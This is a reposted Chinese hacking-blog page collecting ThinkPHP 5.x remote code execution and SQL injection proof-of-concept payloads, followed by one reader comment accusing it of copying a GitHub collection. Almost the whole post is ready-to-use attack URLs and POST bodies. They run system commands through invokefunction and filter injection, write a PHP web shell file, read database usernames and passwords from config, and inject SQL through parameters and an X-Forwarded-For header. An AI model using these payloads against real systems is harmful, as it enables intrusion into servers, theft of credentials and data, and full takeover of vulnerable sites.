Dragon
  • 一个纯白的黑客网站,一直在努力,apt的路上,更精彩!
文章评分 0 次,平均分 0.0

thinkphp 5.0.22

  1. http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
  2. http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
  3. http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
  4. http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5

  1. http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

thinkphp 5.0.21

  1. http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
  2. http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.1.*

  1. http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
  2. http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
  3. http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
  4. http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
  5. http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
  6. http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
  7. http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
  8. http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

未知版本

  1. ?s=index/\think\module/action/param1/${@phpinfo()}
  2. ?s=index/\think\Module/Action/Param/${@phpinfo()}
  3. ?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
  4. index.php?s=/home/article/view_recent/name/1'
  5. header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
  6. index.php?s=/home/shopcart/getPricetotal/tag/1%27
  7. index.php?s=/home/shopcart/getpriceNum/id/1%27
  8. index.php?s=/home/user/cut/id/1%27
  9. index.php?s=/home/service/index/id/1%27
  10. index.php?s=/home/pay/chongzhi/orderid/1%27
  11. index.php?s=/home/pay/index/orderid/1%27
  12. index.php?s=/home/order/complete/id/1%27
  13. index.php?s=/home/order/complete/id/1%27
  14. index.php?s=/home/order/detail/id/1%27
  15. index.php?s=/home/order/cancel/id/1%27
  16. index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
  17. POST /index.php?s=/home/user/checkcode/ HTTP/1.1
    Content-Disposition: form-data; name="couponid"1') union select sleep('''+str(sleep_time)+''')#

thinkphp 5.0.23(完整版)debug 模式

  1. (post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx

thinkphp 5.0.23(完整版)

  1. (post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

thinkphp 5.0.10(完整版)

  1. (post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system

thinkphp 5.1.* 和 5.2.* 和 5.0.*

  1. (post)public/index.php (data)c=exec&f=calc.exe&_method=filter

当 php7 以上无法使用 assert 的时候用

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=包含&x=phpinfo();

有上传图片或者日志用这个包含就可以



本文转载自Thinkphp v5.x 远程代码执行漏洞-POC集合,本文观点不代表lsh4ck's Blog立场,版权归原作者所有,欢迎分享本文,转载请保留出处!

admin
Admin 关注:0    粉丝:4 最后编辑于:2019-06-09
这个人很懒,什么都没写

发表评论

表情 链接 私密 格式 签到

  1. SkyBlue永恒
    SkyBlue永恒 来自天朝的朋友 谷歌浏览器 49.0.2623.87 Windows 7 北京市 联通

    https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
    9 成转载,自己补充点,成原创了?

切换注册

登录

短信快捷登录 忘记密码 ?

切换登录

注册

验证码

×

感谢您对admin的支持,么么哒~

支付宝打赏 admin
请扫码随意打赏

打开支付宝扫一扫,即可进行扫码打赏哦

lsh4ck's Blog - Hacking is endless! Focus on network security!

扫一扫二维码分享

无觅相关文章插件,快速提升流量